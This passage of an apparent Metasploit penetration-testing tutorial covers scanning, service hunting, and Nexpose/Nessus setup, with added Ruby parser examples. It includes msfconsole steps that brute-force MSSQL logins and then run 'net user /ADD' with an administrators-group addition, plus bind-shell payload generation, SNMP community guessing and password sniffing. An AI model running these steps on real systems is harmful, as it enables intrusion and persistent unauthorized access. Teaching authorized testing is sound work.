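    end
  end
  stage
end

# Drive both ends over a local socket pair so the example runs offline.
# The handler deliberately writes in small pieces to exercise the
# short-read loop on the stager side.
def simulate_staging(stage)
  stager_end, handler_end = Socket.pair(:UNIX, :STREAM, 0)
  handler = Thread.new do
    frame_stage(stage).bytes.each_slice(7) { |s| handler_end.write(s.pack('C*')) }
    handler_end.close
  end
  received = receive_stage(stager_end)
  handler.join
  stager_end.close
  received
end

if __FILE__ == $PROGRAM_NAME
  stage = ("\x90" * 1000 + "\xcc").b   # constructed placeholder stage
  got = simulate_staging(stage)
  puts "stage of #{stage.bytesize} bytes delivered intact: #{got == stage}"
end
```

Two failure modes are handled on purpose: a connection that drops mid-transfer is reported instead of leaving a half-read stage, and an oversized length is rejected before any buffer is allocated. Real stagers are tiny and skip such checks, which is exactly why the handler side, not the stager, is where you get to be careful.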

1.7.1 Generating Payloads


When you're writing an exploit, you'll almost certainly need to generate shellcode. In Metasploit, payloads can be generated from within msfconsole as well:

msf > use payload/windows/shell/bind_tcp
msf payload(bind_tcp) > generate

2 Information Gathering
Information gathering is the basis of a successful penetration test. It tells you which machines are reachable, what they run and, from that, which of them are likely to be vulnerable and which are not.

2.1 The Dradis Framework


Dradis is an open-source framework to enable effective information sharing, especially during security assessments. It is a self-contained web application that provides a centralised repository of information to keep track of what has been done so far, and what is still ahead. Dradis is far more than just a mere note-taking application. Communicating over SSL, it can import Nmap and Nessus result files, attach files, generate reports, and can be extended to connect with external systems.

Once we install and start the server, we can open the dradis web interface on the address https://127.0.0.1:3004.

On the left side we can create a tree structure and use it to organize the information: Hosts, Subnets, Services, etc. On the right side we can add relevant information to each element.

2.2 Configuring Databases


When penetrating a target network, we have to keep track of what we've done so far. In metasploit we can save everything in a database - we can use mysql or postgresql. The following command shows which drivers are available in the current metasploit:

    msf > db_driver

To use mysql, we must first start the mysql daemon and then tell metasploit to use it:

    msf > db_driver mysql

Once the driver has been loaded we must connect to the database (if the database doesn't exist already, it will be created automatically):

    msf > db_connect user:pass@host/msf3

To make sure that we're connected correctly, we can use:

    msf > db_status

2.3 Port Scanning


We can use the db_nmap command to run an nmap scan against our targets and have the scan results stored in the database. If you also wish to import the scan results into dradis, you will have to export the scan results in XML format. To create that automatically, we can pass the -oA <filename> option to nmap, which creates all three nmap output formats: XML, grepable, normal.

    msf > nmap -v -sV -oA subnet 192.168.1.0/24

2.3.1 Importing Nmap Results into Metasploit


First we have to connect to the database:

    > db_connect root:toor@127.0.0.1/msf3

When the scan is finished, we can issue db_import to automatically save the XML file into the metasploit database:

    msf > db_import subnet.xml
    [*] Importing 'Nmap XML' data
    [*] Importing host 192.168.50.1
    [*] Importing host 192.168.50.100
    [*] Importing host 192.168.50.101
    [*] Importing host 192.168.50.106
    [*] Successfully imported /home/eleanor/subnet.xml

If we don't wish to import the results into dradis, we don't have to create an XML file, so we can simply run db_nmap omitting the output flag:

    msf > db_nmap -sS -A 192.168.1.0/24

Results of the imported nmap scan can be viewed with the db_hosts and db_services commands:

    msf > hosts

    Hosts
    =====

    address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
    -------        ---                ----  -------  ---------  -----  -------  ----  --------
    192.168.1.1    00:16:0A:13:E9:B0
    192.168.1.100
    192.168.1.101  00:16:6F:3A:D4:C0        Unknown                    device
    192.168.1.106  08:00:27:E3:5B:D0        Unknown                    device

    msf > services

    Services
    ========

    host           port  proto  name            state   info
    ----           ----  -----  ----            -----   ----
    192.168.1.1    80    tcp    http            open
    192.168.1.1    1900  tcp    upnp            closed
    192.168.1.100  9091  tcp    xmltec-xmlmail  open
    192.168.1.101  139   tcp    netbios-ssn     open
    192.168.1.101  445   tcp    microsoft-ds    open    Microsoft Windows XP microsoft-ds
    192.168.1.106  135   tcp    msrpc           open    Microsoft Windows RPC
    192.168.1.106  139   tcp    netbios-ssn     open
    192.168.1.106  445   tcp    microsoft-ds    open    Microsoft Windows XP microsoft-ds
    192.168.1.106  9876  tcp    sd              open
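As an added example (not code from the original document or from Metasploit), here is a minimal reader for the Nmap XML that db_import consumes; it builds the same hosts and services views shown above from a constructed sample scan, skipping hosts nmap reported as down.

```ruby
# Added example: parse Nmap -oX/-oA XML into the "hosts" and "services"
# views that db_import populates. The XML below is constructed sample data.
require 'rexml/document'

SAMPLE_NMAP_XML = <<~XML
  <?xml version="1.0"?>
  <nmaprun scanner="nmap" args="nmap -sV -oA subnet 192.168.1.0/24">
    <host>
      <status state="up"/>
      <address addr="192.168.1.1" addrtype="ipv4"/>
      <address addr="00:16:0A:13:E9:B0" addrtype="mac"/>
      <ports>
        <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
        <port protocol="tcp" portid="1900"><state state="closed"/><service name="upnp"/></port>
      </ports>
    </host>
    <host>
      <status state="up"/>
      <address addr="192.168.1.106" addrtype="ipv4"/>
      <address addr="08:00:27:E3:5B:D0" addrtype="mac"/>
      <ports>
        <port protocol="tcp" portid="445"><state state="open"/>
          <service name="microsoft-ds" product="Microsoft Windows XP microsoft-ds"/></port>
        <port protocol="tcp" portid="135"><state state="open"/>
          <service name="msrpc" product="Microsoft Windows RPC"/></port>
      </ports>
    </host>
    <host>
      <status state="down"/>
      <address addr="192.168.1.2" addrtype="ipv4"/>
    </host>
  </nmaprun>
XML

# Address of the given type (ipv4 or mac) for a <host> element, or nil.
def nmap_addr(host, type)
  el = host.elements["address[@addrtype='#{type}']"]
  el && el.attributes['addr']
end

# Returns { hosts: [...], services: [...] } shaped like the msfconsole tables.
def import_nmap_xml(xml)
  doc = REXML::Document.new(xml)
  hosts = []
  services = []
  doc.elements.each('nmaprun/host') do |h|
    # db_import only stores live hosts; skip the ones nmap saw as down.
    status = h.elements['status']
    next if status && status.attributes['state'] != 'up'
    ip = nmap_addr(h, 'ipv4')
    next if ip.nil?
    hosts << { address: ip, mac: nmap_addr(h, 'mac') }
    h.elements.each('ports/port') do |p|
      svc = p.elements['service']
      services << {
        host:  ip,
        port:  p.attributes['portid'].to_i,
        proto: p.attributes['protocol'],
        name:  svc && svc.attributes['name'],
        state: p.elements['state'].attributes['state'],
        info:  svc && svc.attributes['product']
      }
    end
  end
  { hosts: hosts, services: services }
end

# The open services are the exposure a defender reviews first.
def open_services(result)
  result[:services].select { |s| s[:state] == 'open' }
end
```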

We can also import nmap results into dradis - just choose Import, select the generated XML file.

2.3.2 Nmap: The TCP Idle Scan


The TCP Idle scan allows us to scan a target by spoofing the IP address of another host on the network. For this type of scan, we must first locate an idle host on the network that uses incremental IP IDs. Let's find an idle host on the network:

    msf > use auxiliary/scanner/ip/ipidseq
    msf  auxiliary(ipidseq) > show options

    Module options (auxiliary/scanner/ip/ipidseq):

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       INTERFACE                   no        The name of the interface
       RHOSTS                      yes       The target address range or CIDR identifier
       RPORT      80               yes       The target port
       SNAPLEN    65535            yes       The number of bytes to capture
       THREADS    1                yes       The number of concurrent threads
       TIMEOUT    500              yes       The reply read timeout in milliseconds

We must set RHOSTS, and it's a good idea to also set THREADS to a higher number. THREADS specifies the number of concurrent threads scanning for an idle host.

    msf > use auxiliary/scanner/ip/ipidseq
    msf  auxiliary(ipidseq) > set RHOSTS 192.168.1.0/24
    RHOSTS => 10.1.1.0/24
    msf  auxiliary(ipidseq) > set THREADS 50
    THREADS => 50
    msf  auxiliary(ipidseq) > run

    [*] 192.168.1.2's IPID sequence class: All zeros
    [*] 192.168.1.3's IPID sequence class: Incremental!
    [*] Auxiliary module execution completed

We can see that the potential idle host is 192.168.1.3. Now we can run the nmap idle scan with the -sI command line option.

    msf  auxiliary(ipidseq) > nmap -Pn -sI 192.168.1.3 192.168.1.1

By using the idle host, we were able to discover a number of open ports on our target 192.168.1.1 system without sending a single packet to the system.
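The classification that ipidseq prints, reimplemented as an added example (not the module's own code): it takes the IP ID values observed in successive replies from one host and assigns the class. The step tolerance and the byte-swap check are my assumptions; the class names follow the module's output. The same check tells a defender which of their own hosts could be abused as an idle-scan zombie, which is fixed by randomising IP IDs.

```ruby
# Added example: classify a host's IP ID sequence the way ipidseq does.
# MAX_STEP is an assumed tolerance for "incremental" (busy hosts advance
# by more than one between our probes).
MAX_STEP = 5

def classify_ipid_sequence(ids)
  return 'Unknown' if ids.size < 3
  return 'All zeros' if ids.all?(&:zero?)

  # Differences between consecutive IDs, wrapping at 16 bits.
  diffs = ids.each_cons(2).map { |a, b| (b - a) & 0xffff }
  return 'Constant' if diffs.all?(&:zero?)
  return 'Incremental!' if diffs.all? { |d| d.between?(1, MAX_STEP) }

  # Some stacks emit the counter byte-swapped; re-check after swapping.
  swapped = ids.map { |x| ((x & 0xff) << 8) | ((x >> 8) & 0xff) }
  sdiffs = swapped.each_cons(2).map { |a, b| (b - a) & 0xffff }
  return 'Broken little-endian incremental!' if sdiffs.all? { |d| d.between?(1, MAX_STEP) }

  # Never stepping "backwards" (no wrap in the high half) but with large
  # jumps: random positive increments. Anything else is fully randomised.
  return 'Random positive increments' if diffs.all? { |d| d < 0x8000 }
  'Randomized'
end

# Only "Incremental!" hosts leak the per-packet counter the idle scan
# relies on, so they are the ones worth remediating on your own network.
def idle_scan_candidates(observations)
  observations.select { |_, ids| classify_ipid_sequence(ids) == 'Incremental!' }.keys
end

# Constructed sample observations (six replies per host), not real captures.
SAMPLE_IPIDS = {
  '192.168.1.2' => [0, 0, 0, 0, 0, 0],
  '192.168.1.3' => [1501, 1502, 1503, 1504, 1505, 1506],
  '192.168.1.4' => [0xdb05, 0xdc05, 0xdd05, 0xde05, 0xdf05, 0xe005],
  '192.168.1.5' => [41234, 3377, 59012, 12, 24501, 9000]
}

if __FILE__ == $PROGRAM_NAME
  SAMPLE_IPIDS.each { |host, ids| puts "[*] #{host}'s IPID sequence class: #{classify_ipid_sequence(ids)}" }
end
```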

2.3.3 Metasploit Port Scanning


In addition to nmap, metasploit also has several port scanners built into auxiliary modules. Scanners and most other auxiliary modules use the RHOSTS option instead of RHOST. RHOSTS can take various input: IP ranges, CIDR ranges and line-separated host list files. By default, all scanner modules have the THREADS value set to 1, which means that there will be only one concurrent thread while scanning. If you want to speed up your scans, you can set this value to a higher number. We can see a list of port scanning tools if we enter the search portscan command:

    msf > search portscan
    [*] Searching loaded modules for pattern 'portscan'...

    Auxiliary
    =========

       Name                        Disclosure Date  Rank    Description
       ----                        ---------------  ----    -----------
       scanner/portscan/ack                         normal  TCP ACK Firewall Scanner
       scanner/portscan/ftpbounce                   normal  FTP Bounce Port Scanner
       scanner/portscan/syn                         normal  TCP SYN Port Scanner
       scanner/portscan/tcp                         normal  TCP Port Scanner
       scanner/portscan/xmas                        normal  TCP "XMas" Port Scanner

Example of using a different port scanner:

    msf > use auxiliary/scanner/portscan/syn
    msf auxiliary(syn) > set INTERFACE wlan0
    msf auxiliary(syn) > set PORTS 80
    msf auxiliary(syn) > set RHOSTS 192.168.1.0/24
    msf auxiliary(syn) > set THREADS 50
    msf auxiliary(syn) > run

2.4 Targeted Scanning


A targeted scan looks for specific operating systems, services, program versions, or configurations that are known to be exploitable.

2.4.1 Hunting for SMB


Metasploit can scan a network and attempt to identify versions of Microsoft Windows using the smb_version module, which probes the SMB file-sharing service.

    msf > use scanner/smb/smb_version
    msf  auxiliary(smb_version) > set RHOSTS 192.168.1.0/24
    msf  auxiliary(smb_version) > set THREADS 50
    msf  auxiliary(smb_version) > run

    [*] 192.168.1.166 is running Windows XP Service Pack 3 (language: English)
    [*] Auxiliary module execution completed

We have discovered a running Windows XP system without having to do a full scan of the network. This is a great way to quickly and quietly target the hosts that are likely to be more vulnerable when our goal is to avoid being noticed.

2.4.2 Hunting for MSSQL


With metasploit we can do UDP footprinting of MSSQL servers. The MSSQL server listens either on TCP port 1433 or on a random port - if the port is dynamically assigned, it can be rather hard to find the MSSQL server to attack. But Microsoft uses UDP port 1434, which lets us pull quite a lot of information about the SQL server, including which TCP port it listens on. We can use the mssql_ping module to detect the MSSQL databases.

    msf > use scanner/mssql/mssql_ping
    msf auxiliary(mssql_ping) > set RHOSTS 192.168.1.0/24
    msf auxiliary(mssql_ping) > set THREADS 255
    msf auxiliary(mssql_ping) > exploit
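What mssql_ping reads from UDP 1434 is the SQL Server Browser reply (the SSRP SVR_RESP message from MS-SQLR); the parser below is an added example, not Metasploit's code, that decodes a constructed reply into per-instance fields and pulls out the TCP port of each instance, which is how the dynamic port becomes known.

```ruby
# Added example: decode an SSRP (SQL Server Resolution Protocol) response.
# Wire format: one byte 0x05, a 16-bit little-endian length, then ASCII
# "key;value;key;value;...;;" for each instance, ending in ";;".
# The payload below is constructed sample data, not a real capture.
SAMPLE_SSRP_PAYLOAD =
  "ServerName;SQLHOST;InstanceName;MSSQLSERVER;IsClustered;No;" \
  "Version;9.00.1399.06;tcp;1433;np;\\\\SQLHOST\\pipe\\sql\\query;;" \
  "ServerName;SQLHOST;InstanceName;SQLEXPRESS;IsClustered;No;" \
  "Version;10.50.1600.1;tcp;49172;np;\\\\SQLHOST\\pipe\\MSSQL$SQLEXPRESS\\sql\\query;;"
SAMPLE_SSRP_RESPONSE = [0x05, SAMPLE_SSRP_PAYLOAD.bytesize].pack('Cv') + SAMPLE_SSRP_PAYLOAD

# Returns an array of hashes, one per instance, keyed by the SSRP field names.
def parse_ssrp_response(data)
  unless data.bytesize >= 3 && data.getbyte(0) == 0x05
    raise ArgumentError, 'not an SSRP SVR_RESP message'
  end
  len  = data.byteslice(1, 2).unpack('v').first
  body = data.byteslice(3, len)
  raise ArgumentError, 'truncated SSRP response' if body.nil? || body.bytesize < len

  body.split(';;').reject(&:empty?).map do |instance|
    fields = instance.split(';', -1)
    # A dangling key without a value is dropped rather than misaligning pairs.
    fields.each_slice(2).select { |kv| kv.size == 2 }.to_h
  end
end

# Map instance name -> TCP port. Instances that only expose named pipes
# (no "tcp" field) are omitted, since they are not reachable over TCP.
def ssrp_tcp_ports(instances)
  instances.each_with_object({}) do |inst, ports|
    ports[inst['InstanceName']] = inst['tcp'].to_i if inst['tcp']
  end
end

if __FILE__ == $PROGRAM_NAME
  parse_ssrp_response(SAMPLE_SSRP_RESPONSE).each do |inst|
    puts "[*] #{inst['ServerName']}\\#{inst['InstanceName']} version #{inst['Version']} tcp/#{inst['tcp']}"
  end
end
```

Knowing which instances answer on which ports is also how a defender verifies that only the intended listener is reachable through the firewall and that the Browser service itself is not exposed.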

The scan gathers quite a lot of information, like the name of the machine and the TCP port MSSQL is running on. From there, we can use the scanner/mssql/mssql_login module to brute-force the password by passing the module a dictionary file. You can also use FastTrack, Medusa or Hydra to do this.

    msf > use scanner/mssql/mssql_login
    msf  auxiliary(mssql_login) > set PASS_FILE /pentest/exploits/fasttrack/bin/dict/wordlist.txt
    msf  auxiliary(mssql_login) > set RHOST 192.168.1.1
    msf  auxiliary(mssql_login) > set THREADS 50
    msf  auxiliary(mssql_login) > set verbose false
    msf  auxiliary(mssql_login) > exploit

Then we can also use the mssql_exec module to execute a certain command on the target system. We must also specify the password, which is required for a successful login.

    msf > use admin/mssql/mssql_exec
    msf auxiliary(mssql_exec) > set RHOST 192.168.1.1
    msf auxiliary(mssql_exec) > set MSSQL_PASS password
    msf auxiliary(mssql_exec) > set CMD net user <user> <pass> /ADD
    msf auxiliary(mssql_exec) > set CMD net localgroup administrators <user> /ADD
    msf auxiliary(mssql_exec) > exploit

With the set CMD commands we added the user <user> and added him to the administrators group. At this point we have full control over the system.

2.4.3 Hunting for SSH


If a host runs the SSH service (port 22), we can still gather as much information from it as possible with the ssh_version module.

    msf > use scanner/ssh/ssh_version
    msf auxiliary(ssh_version) > show options
    msf auxiliary(ssh_version) > set RHOSTS 192.168.1.1-192.168.1.100
    msf auxiliary(ssh_version) > set THREADS 50
    msf auxiliary(ssh_version) > run

    [*] 192.168.1.111:22, SSH server version: SSH-2.0-OpenSSH_5.8p1 Debian-1ubuntu3
    [*] Auxiliary module execution completed

2.4.4 Hunting for FTP


FTP is a very insecure protocol that sends everything, including usernames and passwords, in clear text. To scan our network for FTP servers, we can use the ftp_version module.

    msf  auxiliary(ssh_version) > use scanner/ftp/ftp_version
    msf  auxiliary(ftp_version) > set RHOSTS 192.168.1.0/24
    msf  auxiliary(ftp_version) > set THREADS 50
    msf  auxiliary(ftp_version) > run

    [*] 192.168.1.1:21 FTP Banner: '220 FTPd 1.6\x0d\x0a'
    [*] Auxiliary module execution completed

The scanner successfully identified the FTP server at 192.168.1.1. Now let's see if this server allows anonymous logins using the ftp/anonymous module.

    msf > use scanner/ftp/anonymous
    msf auxiliary(anonymous) > set RHOSTS 192.168.1.0/24
    msf auxiliary(anonymous) > set THREADS 50
    msf auxiliary(anonymous) > show options
    msf auxiliary(anonymous) > run

    [*] Scanned 256 of 256 hosts (100% complete)
    [*] Auxiliary module execution completed

We can see that the anonymous login is not possible.

2.4.5 SNMP Sweeping


With SNMP we can find a lot of information about a specific system. If Windows-based devices are configured with SNMP, often with the default RO/RW community strings, you can extract patch levels, running services, last reboot times, usernames on the system, routes, and various other information that is valuable to an attacker. If we can get the read/write SNMP community string for a Cisco router, we can download the router's entire configuration, modify it, and upload it back to the router. Community strings are essentially passwords used to query a device for information or to write configuration information to the device. So if we know the community string, we can get quite a lot of information from the device. Metasploit has an auxiliary module called scanner/snmp/snmp_enum that can do SNMP sweeps. The scanner/snmp/snmp_login module tries a word list of community strings against a range of IP addresses in order to find the community string, which can allow a full compromise of the system.

    msf > use auxiliary/scanner/snmp/snmp_login
    msf  auxiliary(snmp_login) > set RHOSTS 192.168.1.0/24
    msf  auxiliary(snmp_login) > set THREADS 50
    msf  auxiliary(snmp_login) > run

    [+] SNMP: 192.168.1.2 community string: 'public' info: 'Linux localhost 2.6.35-22-generic #35-Ubun

We can see that we actually identified a host 192.168.1.2 that has SNMP enabled and since we guessed the community string (password), we also get the information about the kernel, operating system and architecture.

2.4.6 Password Sniffing


In metasploit, there is a module psnuffle, which can sniff passwords off the wire - like dsniff. It supports the following protocols: pop3, imap, ftp, HTTP GET.

    msf > use auxiliary/sniffer/psnuffle
    msf auxiliary(psnuffle) > show options

    Module options:

       Name       Current Setting  Required  Description
       ----       ---------------  --------  -----------
       FILTER                      no        The filter string for capturing traffic
       INTERFACE                   no        The name of the interface
       PCAPFILE                    no        The name of the PCAP capture file to process
       PROTOCOLS  all              yes       A comma-delimited list of protocols to sniff or "all".
       RHOST                       yes       The target address
       SNAPLEN    65535            yes       The number of bytes to capture
       TIMEOUT    1                yes       The number of seconds to wait for new data
    msf auxiliary(psnuffle) > set RHOST 192.168.1.1
    msf auxiliary(psnuffle) > run

2.5 Writing Your Own TCP Scanner


Writing a scanner in metasploit is fairly easy. Some of the many metasploit scanner features are:

    it provides access to all exploit classes and methods
    support is provided for proxies, SSL, and reporting
    built-in threading and range scanning
    easy to write and run quickly

Writing your own scanner is also useful during security audits. Let's write a simple TCP scanner that connects to a host on a default port of 12345, which can be changed via module options at run time. Upon connecting to the server, it sends HELLO SERVER, receives the response and prints it out along with the IP address of the remote host.

    require 'msf/core'

    class Metasploit3 < Msf::Auxiliary
      # Provides connect/disconnect and the sock handle for TCP networking
      include Msf::Exploit::Remote::Tcp
      # Provides RHOSTS/THREADS handling and calls run_host for each target
      include Msf::Auxiliary::Scanner

      def initialize
        super(
          'Name'        => 'My custom TCP scan',
          'Version'     => '$Revision: 10 $',
          'Description' => 'My quick scanner',
          'Author'      => 'Your name here',
          'License'     => MSF_LICENSE
        )
        register_options(
          [
            Opt::RPORT(12345)   # default port, can be changed with "set RPORT"
          ], self.class)
      end

      # Called once per target host by the Scanner mixin
      def run_host(ip)
        connect()
        greeting = "HELLO SERVER"
        sock.puts(greeting)
        data = sock.recv(1024)
        print_status("Received: #{data} from #{ip}")
        disconnect()
      end
    end

Save the file into the modules/auxiliary/scanner/ directory as simple_tcp.rb and load up msfconsole. Since modules are loaded at startup, we have to restart msfconsole to pick it up. This simple scanner uses Msf::Exploit::Remote::Tcp to handle the TCP networking, and Msf::Auxiliary::Scanner exposes the various settings that are required for scanners within the framework. This scanner is configured to use the default port of 12345; upon connecting to the server, it sends the message "HELLO SERVER", receives the reply from the server, and then prints it to the screen along with the server IP address. To test the module, we set up a netcat listener on port 12345 and pipe in a text file to act as the server response:

    # echo "Hello World!" > aaa.txt
    # nc -lvnp 12345 < aaa.txt

Next, we load up msfconsole, select our module, set the parameters and run it to see if it works:

    msf > use auxiliary/scanner/simple_tcp
    msf auxiliary(simple_tcp) > set RHOSTS 192.168.1.1
    msf auxiliary(simple_tcp) > run
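The same HELLO SERVER exchange written with plain Ruby sockets, as an added example that is not part of the original text or of Metasploit: a local TCPServer stands in for the netcat listener, and probe_host adds the read timeout and error handling that the module above lacks, so a listener that accepts but never answers cannot stall the scan. The names probe_host and with_fake_server are my own.

```ruby
# Added example: the simple_tcp scanner's exchange without msfconsole,
# with a connect/read timeout so a silent listener cannot hang the probe.
require 'socket'
require 'timeout'

def probe_host(ip, port, greeting: 'HELLO SERVER', timeout: 2)
  sock = Socket.tcp(ip, port, connect_timeout: timeout)
  sock.puts(greeting)
  data = Timeout.timeout(timeout) { sock.recv(1024) }
  { host: ip, port: port, banner: data.strip, error: nil }
rescue Timeout::Error
  { host: ip, port: port, banner: nil, error: 'no reply within timeout' }
rescue SystemCallError => e      # ECONNREFUSED, EHOSTUNREACH, ETIMEDOUT, ...
  { host: ip, port: port, banner: nil, error: e.class.name }
ensure
  sock.close if sock && !sock.closed?
end

# Stand-in for "nc -lvnp 12345 < aaa.txt": answers each client with `reply`,
# or, when reply is nil, holds the connection open silently for `hold`
# seconds to exercise the timeout path. Yields the ephemeral port.
def with_fake_server(reply, hold: 3)
  server = TCPServer.new('127.0.0.1', 0)
  port = server.addr[1]
  thr = Thread.new do
    client = server.accept
    client.gets                    # consume the greeting
    if reply
      client.write(reply)
    else
      sleep hold
    end
    client.close
  end
  yield port
ensure
  thr&.join(hold + 2)
  server&.close
end

if __FILE__ == $PROGRAM_NAME
  with_fake_server("Hello World!\n") do |port|
    r = probe_host('127.0.0.1', port)
    puts "[*] Received: #{r[:banner]} from #{r[:host]}"
  end
end
```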

3 Vulnerability Scanning
A vulnerability scanner is an automated program designed to look for weaknesses in computers, networks and applications. The program probes a system by sending data to it and analyzing the responses, enumerating any vulnerabilities present on the target by using its vulnerability database as a reference. It's worth mentioning that a vulnerability scanner can easily be fooled by misleading banners or inconsistent configurations on the target system. Various operating systems tend to respond differently when sent particular network probes because of the different networking implementations in use. These unique responses serve as a fingerprint that the vulnerability scanner uses to determine the operating system version. From the results it obtains, the scanner produces a report outlining any vulnerabilities detected on the system. Vulnerability scanners generate a lot of traffic on a network and are easily detectable. If we want to remain stealthy, we have to check for vulnerabilities manually and not use a vulnerability scanner. Vulnerability scanning allows you to quickly scan a target IP range looking for known vulnerabilities. Here we'll look at some of the vulnerability scanning capabilities that metasploit provides.

3.1 Useful Commands


There are a lot of commands we can use when scanning the targets and saving the results in a database. Note that we must first connect to the mysql database for these commands to be meaningful. The commands are:

    hosts     List all the hosts in the database.
    notes     Display the notes of all the hosts in the database. The notes are valuable information that different vulnerability scanners have found.
    services  Display the identified services on the target machines.
    vulns     List all of the vulnerabilities stored in the database.
    creds     List all user credentials that the vulnerability scanners have gathered.

3.2 Nexpose
NeXpose is a vulnerability scanner that scans networks to identify the devices running on them and performs checks to identify security weaknesses in operating systems and applications. The community edition of NeXpose is free, but there's also an enterprise edition available. After installing NeXpose, we can access it via a web browser at https://127.0.0.1:3780. We can log in using the credentials we created during setup. After logging in, we get to the NeXpose main page, which is shown in the picture.
NeXpose interface in a web browser.

The picture shows the following tabs in the NeXpose interface:

    Assets           Details of computers and other devices on our network after they have been scanned.
    Reports          Vulnerability scan reports after they have been generated.
    Vulnerabilities  Details on discovered vulnerabilities.
    Administration   Allows us to configure various options.

3.2.1 Scanning the Target Network


Before we can run a vulnerability scan in NeXpose, we have to configure a site, which is a logical collection of devices (a subnet, a collection of servers, a single host). These sites can then be scanned by NeXpose. To create a new site, click on the New Site button on the NeXpose home page and follow the wizard. First, we have to enter the name and description, then we have to add the target to scan, which can be a single host or a subnet.

A successfully created site will look like the following picture. There we can also see the New Manual Scan button, which we have to click to actually start the scan.

The progress bar, which is showing the completeness of the scan.

We also have to generate a report, so that we can look at the scan results after the scan completes. Click on the New Report in the Reports tab.

Enter the name of the report, and choose the NeXpose Simple XML Export, so that we will be able to import the scan results into metasploit.

In the next window, we have to add the devices we want to include in the report by clicking on Select Sites.

After clicking on Save, the new report is generated.

3.2.2 Nexpose in MSFConsole


We can run Nexpose on its own and import the scan results into the database that metasploit uses. But we can also run nexpose scans directly from msfconsole like this:

    msf auxiliary(crawler) > load nexpose

     ____             _     _ _____   _   _     __  __
    |  _ \ __ _ _ __ (_) __| |___  | | \ | | ___\ \/ /_ __   ___  ___  ___
    | |_) / _` | '_ \| |/ _` | / /  |  \| |/ _ \\  /| '_ \ / _ \/ __|/ _ \
    |  _ < (_| | |_) | | (_| |/ /   | |\  |  __//  \| |_) | (_) \__ \  __/
    |_| \_\__,_|  __/|_|\__,_|/_/    |_| \_|\___/_/\_\  __/ \___/|___/\___|
               |_|                                   |_|


    [*] NeXpose integration has been activated
    [*] Successfully loaded plugin: nexpose
    msf auxiliary(crawler) > help

    NeXpose Commands
    ================

        Command                   Description
        -------                   -----------
        nexpose_activity          Display any active scan jobs on the NeXpose instance
        nexpose_command           Execute a console command on the NeXpose instance
        nexpose_connect           Connect to a running NeXpose instance ( user:pass@host[:port] )
        nexpose_disconnect        Disconnect from an active NeXpose instance
        nexpose_discover          Launch a scan but only perform host and minimal service discovery
        nexpose_dos               Launch a scan that includes checks that can crash services and devi
        nexpose_exhaustive        Launch a scan covering all TCP ports and all authorized safe checks
        nexpose_report_templates  List all available report templates
        nexpose_scan              Launch a NeXpose scan against a specific IP range and import the re
        nexpose_site_devices      List all discovered devices within a site
        nexpose_site_import       Import data from the specified site ID
        nexpose_sites             List all defined sites
        nexpose_sysinfo           Display detailed system information about the NeXpose instance

Before running a scan against a target, we first need to connect to our server running NeXpose by using the nexpose_connect command.

    msf > nexpose_connect eleanor:eleanor@192.168.1.100

Now that we are connected to our server, we can run a vulnerability scan right from within metasploit:

    msf > nexpose_discover 192.168.1.101

After that we can run db_services and db_vulns to see the results.

3.3 Nessus
Metasploit's nessus plugin lets you launch scans and pull information from nessus scans via the console, but we'll import nessus scan results independently.

3.3.1 Installation and Configuration


First we need to install nessus:

    # apt-get install nessus

Then we need to add a new user using the nessus-adduser command, which asks us for the authentication method; several means are available, but we'll choose password. The next question asks about restricting the user account. When the user account is used across an enterprise, a user can be restricted and only allowed to scan specific IP addresses. For most users, this is left blank, allowing them to scan anything.

    # nessus-adduser
    Using /var/tmp as a temporary file holder

    Add a new nessusd user
    ----------------------


    Login : eleanor
    Authentication (pass/cert) [pass] : pass
    Login password :
    Login password (again) :

    User rules
    ----------
    nessusd has a rules system which allows you to restrict the hosts
    that eleanor has the right to test. For instance, you may want
    him to be able to scan his own host only.

    Please see the nessus-adduser(8) man page for the rules syntax

    Enter the rules for this user, and hit ctrl-D once you are done :
    (the user can have an empty rules set)


    Login             : eleanor
    Password          : ***********
    DN                :
    Rules             :


    Is that ok ? (y/n) [y] y
    user added.

Next we also need to generate a certificate with nessus-mkcert to encrypt the traffic between the client and the server.

    # nessus-mkcert

We also need to register on the nessus webpage to receive an activation code. Then we just need to activate nessus:

    # /opt/nessus/bin/nessus-fetch --register <registration_code>

Next, we need to update the plugins. Each plugin is written to test for a specific vulnerability. These can be written to actually exploit the vulnerability or just to test for known vulnerable software versions. Plugins can be written in almost any language but are usually written in Nessus Attack Scripting Language (NASL). NASL is Nessus' own language, specifically designed for writing vulnerability tests. NASL plug-ins typically test by sending very specific code to the target and comparing the results against stored vulnerable values. There are a few built-in plug-ins that do not use NASL. These are C and Perl scripts that perform special purposes that cannot easily be done in NASL. Among these is the Services plug-in, which identifies port-to-program mappings. Plug-in updates should be done frequently. New vulnerabilities are being discovered and disseminated all the time. Typically after a new vulnerability is released to the public, someone in the Nessus community writes a NASL plug-in, releases it to the public and submits it to www.nessus.org. It is then reviewed by the developers and added to the approved plug-in list. For high risk, high profile vulnerabilities a plug-in is often released the same day the vulnerability information is publicly released. To update the plugins, we need to use the nessus-update-plugins command:

    # nessus-update-plugins

Okay, now we have created the user and updated all the plugins, but there isn't yet a daemon to connect to. The simplest way to start a daemon is to issue the following command, which loads all the plugins and takes quite a lot of time.

    # nessus-service -D

We can see that the nessus server is listening on port 1241:

    # netstat -landtp | grep nessus
    tcp        0      0 0.0.0.0:1241            0.0.0.0:*               LISTEN      26114/nessusd

In order to connect to the daemon, we must use a client. There are three clients that we can use:

    Native Unix GUI      This is installed at server install time. Just run the NessusClient command and the GUI will start.
    Command Line Client  We need to install a separate program, nessuscmd.
    NessusWX             This is for Windows users only.

If we start the native unix nessus client GUI, it will look something like this:
Native Unix Nessus Client

We should login with the previously created username. The connection between the client and server will be encrypted.

3.3.2 Using Nessus


The most powerful feature of nessus is its plugins. The choice of plugins is critical to the success of a scan: most plugins are written very well and rarely trigger false positives or negatives, but a few are not.
Main nessus GUI interface

3.3.2.1 Safe Plugins

Some plugins are categorized under the "Denial of Service" category. These plugins will actually perform a DoS attack and crash systems that have these problems - they shouldn't be blindly run on production systems. They won't cause long-term damage, but at least a reboot will be required. It's always a good idea to enable Safe-Checks. Safe-checks disable the dangerous parts of safe-check compatible plugins so that they do not actually cause damage to the target, but just collect version numbers from banners. Safe-checks might cause false positives or false negatives. The valuable trade-off is that they should not crash a machine.
Enable the safe-checks.

